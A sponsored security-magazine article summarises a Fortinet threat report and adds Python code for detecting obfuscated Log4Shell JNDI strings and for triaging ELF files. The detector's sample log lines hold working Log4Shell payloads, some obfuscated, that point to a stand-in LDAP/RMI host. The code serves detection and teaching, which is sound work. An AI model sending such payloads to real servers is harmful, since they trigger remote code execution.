Canadian Security Magazine

New report sheds light on most destructive cybersecurity threats and best defenses

By Derek Manky   

Sponsored by Fortinet

Derek Manky, FortiGuard Labs

The latest Fortinet Global Threat Landscape report points to a troubling trend: cybercriminals are developing attacks faster than ever. Examining the second half of 2021, the team at FortiGuard Labs found evidence that criminal tactics are evolving rapidly as attackers adopt more destructive and unpredictable advanced persistent cybercrime strategies.

The report draws on data from billions of threat events, offering security professionals insight into the threat landscape at both a regional and a global level.

From exploiting new technologies to taking advantage of "remote everything", attackers are quickly evolving their tactics for faster, more sophisticated, and more destructive attacks. This advanced persistent cybercrime strategy is unpredictable, and it is critical that organizations understand the threat landscape in order to protect their rapidly expanding networks.

Attack speeds are increasing
In early December 2021, a vulnerability was disclosed in the Apache Log4j logging framework (CVE-2021-44228, widely known as Log4Shell). Log4j is deployed on servers globally and used by millions of applications. The flaw demonstrated how rapidly cybercriminals can exploit a newly disclosed vulnerability: activity escalated so quickly that it became the year's most prevalent intrusion prevention system (IPS) detection, logging 50 times the activity of ProxyLogon, another well-known 2021 outbreak. The vulnerability earned the maximum CVSS score (10.0) because it was trivial to exploit, requiring only that an attacker-controlled string reach a logging call, and it delivered full remote code execution on the target system.

What does this mean for organizations? The speed and potential damage of this attack should prompt defenders to measure how long it actually takes them to react to a new threat and patch the affected systems, and to plan compensating controls, such as IPS signatures or virtual patching, for the window before a patch can be applied.
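As an added illustration, not taken from the Fortinet report or from FortiGuard Labs' own IPS signatures, the following Python script shows the kind of detection logic an IPS or log monitor needs for this vulnerability. It scans web-server access log lines for the JNDI lookup string that triggers the flaw, after first collapsing the nested lookup wrappers (`${lower:j}`, `${upper:n}`, `${::-j}`) that attackers used to hide the literal `${jndi:` from naive pattern matching. The log lines, the host 203.0.113.10 and the ports are constructed sample data.

```python
import re

# Lookup wrappers that Log4j 2 resolves before it matches the "jndi" prefix, and which
# attackers nested to hide the literal string "${jndi:" from naive pattern matching.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{([^{}]*?):-([^{}]*)\}")  # ${name:-default} -> default when name is unresolvable
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/:}\s]+)", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 16) -> str:
    """Collapse nested ${lower:..}, ${upper:..} and ${x:-y} wrappers, innermost first.

    Each round rewrites only wrappers with no braces inside them, so the loop
    unwinds nesting from the inside out. max_rounds bounds the work on hostile input.
    """
    for _ in range(max_rounds):
        step = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        step = _DEFAULT_LOOKUP.sub(lambda m: m.group(2), step)
        if step == text:
            break
        text = step
    return text


def detect_jndi(line: str):
    """Return (scheme, host) for the first JNDI lookup found after de-obfuscation, else None."""
    match = _JNDI.search(normalize_lookups(line))
    if not match:
        return None
    return match.group(1).lower(), match.group(2)


def scan(lines):
    """Return [(line_number, scheme, host)] for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        found = detect_jndi(line)
        if found:
            hits.append((number, found[0], found[1]))
    return hits


# Constructed access-log lines (not real traffic); 203.0.113.0/24 is a documentation address range.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:14:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:14:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.10:1099/b}"',
    '10.0.0.7 - - [10/Dec/2021:03:15:00 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for number, scheme, host in scan(SAMPLE_LOG):
        print(f"line {number}: JNDI lookup via {scheme} to {host}")
```

The last sample line carries a harmless `${date:yyyy}` lookup and is deliberately not flagged; a detector that alerts on every `${` will drown analysts in false positives, while one that looks only for the literal `${jndi:` misses the second and third obfuscated requests. Matching on a payload string is still only a stopgap: the host reached via LDAP or RMI is the indicator worth blocking at the egress firewall while the patch is rolled out.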

New vectors, new targets
Recently, new malware targeting Linux systems has emerged, typically delivered as Executable and Linkable Format (ELF) binaries. Long overlooked by threat actors, Linux has become a more attractive target because it is the backbone of many network back-end systems, container-based and IoT device solutions, and mission-critical applications. According to the Global Threat Landscape report, the rate of new Linux malware signatures quadrupled over 2021, and malware detections of ELF files doubled. With Microsoft integrating the Windows Subsystem for Linux (WSL) into Windows 11, Linux binaries can now run on Windows endpoints as well, so organizations will need to secure, monitor, and manage Linux and other non-Windows systems with the same diligence they apply to any other endpoint.
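As an added example, independent of the report and of any Fortinet tooling, the following Python script is a minimal ELF triage parser of the kind used to sort a pile of suspicious Linux or IoT files before deeper analysis. It reads the ELF header and program headers, reports class, endianness, architecture and file type, and flags two properties that are common in Linux malware: static linking (no interpreter or dynamic section, so the file runs on any device of that architecture) and a loadable segment mapped both writable and executable (typical of packers and self-modifying code). The sample image is built inside the script by the hypothetical `build_sample` helper and is not a real binary; `triage_elf` and `ElfTriage` are names chosen here.

```python
import struct
from dataclasses import dataclass

ELF_MAGIC = b"\x7fELF"
E_TYPES = {1: "REL", 2: "EXEC", 3: "DYN", 4: "CORE"}
E_MACHINES = {3: "x86", 8: "MIPS", 40: "ARM", 62: "x86-64", 183: "AArch64"}
PT_LOAD, PT_DYNAMIC, PT_INTERP = 1, 2, 3
PF_X, PF_W, PF_R = 1, 2, 4

# Field layouts from the ELF specification. The 32-bit program header stores p_flags
# seventh while the 64-bit one stores it second; a parser that ignores this misreads permissions.
_EHDR = {64: "16sHHIQQQIHHHHHH", 32: "16sHHIIIIIHHHHHH"}
_PHDR = {64: "IIQQQQQQ", 32: "IIIIIIII"}
_PFLAGS_INDEX = {64: 1, 32: 6}


@dataclass
class ElfTriage:
    bits: int
    endian: str
    e_type: str
    machine: str
    entry: int
    segments: int
    static: bool        # no PT_INTERP/PT_DYNAMIC: statically linked
    rwx_segment: bool   # a PT_LOAD segment that is both writable and executable


def triage_elf(data: bytes) -> ElfTriage:
    """Parse the ELF header and program headers and summarise what matters for triage."""
    if len(data) < 16 or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    bits = 64 if data[4] == 2 else 32          # e_ident[EI_CLASS]
    end = "<" if data[5] == 1 else ">"         # e_ident[EI_DATA]
    ehdr_fmt, phdr_fmt = end + _EHDR[bits], end + _PHDR[bits]
    if len(data) < struct.calcsize(ehdr_fmt):
        raise ValueError("truncated ELF header")
    hdr = struct.unpack_from(ehdr_fmt, data, 0)
    e_type, e_machine, e_entry, e_phoff = hdr[1], hdr[2], hdr[4], hdr[5]
    e_phentsize, e_phnum = hdr[9], hdr[10]

    static, rwx = True, False
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if off + struct.calcsize(phdr_fmt) > len(data):
            raise ValueError("program header table runs past end of file")
        ph = struct.unpack_from(phdr_fmt, data, off)
        p_type, p_flags = ph[0], ph[_PFLAGS_INDEX[bits]]
        if p_type in (PT_INTERP, PT_DYNAMIC):
            static = False
        if p_type == PT_LOAD and p_flags & PF_W and p_flags & PF_X:
            rwx = True
    return ElfTriage(
        bits=bits,
        endian="little" if end == "<" else "big",
        e_type=E_TYPES.get(e_type, str(e_type)),
        machine=E_MACHINES.get(e_machine, hex(e_machine)),
        entry=e_entry,
        segments=e_phnum,
        static=static,
        rwx_segment=rwx,
    )


def build_sample(bits: int = 64, p_flags: int = PF_R | PF_W | PF_X, machine: int = 62) -> bytes:
    """Constructed minimal little-endian ELF image: header plus one PT_LOAD segment, no code."""
    ident = ELF_MAGIC + bytes([2 if bits == 64 else 1, 1, 1, 0]) + bytes(8)
    ehsize = struct.calcsize("<" + _EHDR[bits])
    phentsize = struct.calcsize("<" + _PHDR[bits])
    if bits == 64:
        ehdr = struct.pack("<" + _EHDR[64], ident, 2, machine, 1, 0x401000, ehsize, 0, 0,
                           ehsize, phentsize, 1, 64, 0, 0)
        phdr = struct.pack("<" + _PHDR[64], PT_LOAD, p_flags, 0, 0x400000, 0x400000, 0x1000, 0x1000, 0x1000)
    else:
        ehdr = struct.pack("<" + _EHDR[32], ident, 2, machine, 1, 0x8049000, ehsize, 0, 0,
                           ehsize, phentsize, 1, 40, 0, 0)
        phdr = struct.pack("<" + _PHDR[32], PT_LOAD, 0, 0x8048000, 0x8048000, 0x1000, 0x1000, p_flags, 0x1000)
    return ehdr + phdr


if __name__ == "__main__":
    print(triage_elf(build_sample()))
    print(triage_elf(build_sample(bits=32, p_flags=PF_R | PF_X, machine=40)))
```

The `machine` field is the quickest tell on a mixed estate: an ARM or MIPS executable turning up on an x86 file server did not come from the server's own package manager. Header parsing is a triage aid, not a verdict; a clean-looking header says nothing about what the code does, and the length checks matter because malformed headers are a common way to crash naive scanners.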

Botnets grow in sophistication
The report also warns that botnets are adopting newer and more sophisticated attack techniques. Today's botnets are moving beyond straightforward DDoS attacks, with threat actors now building attack kits that also deliver ransomware. Recent botnet activity showed an association with a new variant of the RedXOR malware, which targets Linux systems for data exfiltration. In addition, detections of botnets delivering a variant of the RedLine Stealer malware surged in early October, using a COVID-themed file as the lure to find new targets.

Organizations can help protect against botnets by implementing zero-trust access solutions. Shifting to a least-privilege access approach means each device, including IoT endpoints, is granted only the network reachability it needs, so a compromised device cannot freely reach command-and-control infrastructure or other internal systems. Automated detection and response capabilities can then identify and isolate unusual activity from those devices.

More destructive ransomware
Threat actors keep increasing the destructive impact of widespread ransomware attacks by combining them with DDoS attacks or wiper malware. As ransomware-as-a-service (RaaS) business models proliferate, attacks are becoming a reality for all types of organizations. Over the course of the year, FortiGuard Labs observed a consistent level of malicious activity featuring ransomware strains such as Phobos, Yanluowang, and BlackMatter. More recently, new wiper malware has appeared, and RagnarLocker has adopted triple extortion: file encryption, the threat to leak stolen data, and a DDoS attack as the third layer of pressure behind the ransom demand.

Organizations will need an end-to-end security approach that covers every entry point to prevent ransomware attacks, augmented by investment in advanced detection and mitigation and access to current threat intelligence. Because wipers and triple extortion leave nothing to recover by paying, tested offline backups remain the last line of defence.

Responding with intelligence
Having access to trusted insight into changing attack techniques is another way organizations can better prepare for cyberattacks. For this report, FortiGuard Labs detonated samples of the malware it detected to better understand how they would affect organizations. The analysis confirmed that organizations have a much better chance of intervening and minimizing the impact if an intrusion is caught early, before the later stages of the attack chain execute.

Threat intelligence services can help organizations stay on top of the latest threat trends and run more efficient security operations. With insight into the global threat landscape, organizations can focus their resources and proactively defend against trending threats, preventing attacks or identifying them early.

Staying a step ahead
The latest Global Threat Landscape report confirms that more frequent, unpredictable, and destructive cyberattacks are the new normal. Ad hoc collections of point products are no longer a viable defense. Instead, organizations must move toward integrated, intelligent solutions that ingest real-time threat intelligence and detect threat patterns to initiate a coordinated response. A cybersecurity mesh platform provides greater visibility and centralized management, so that policies are enforced consistently, updates are delivered promptly, and threat responses are coordinated faster across the extended network. These integrated solutions are an organization's best chance to stay ahead of the rapidly changing threat landscape.

Derek Manky is Chief Security Strategist & VP Global Threat Intelligence, FortiGuard Labs.
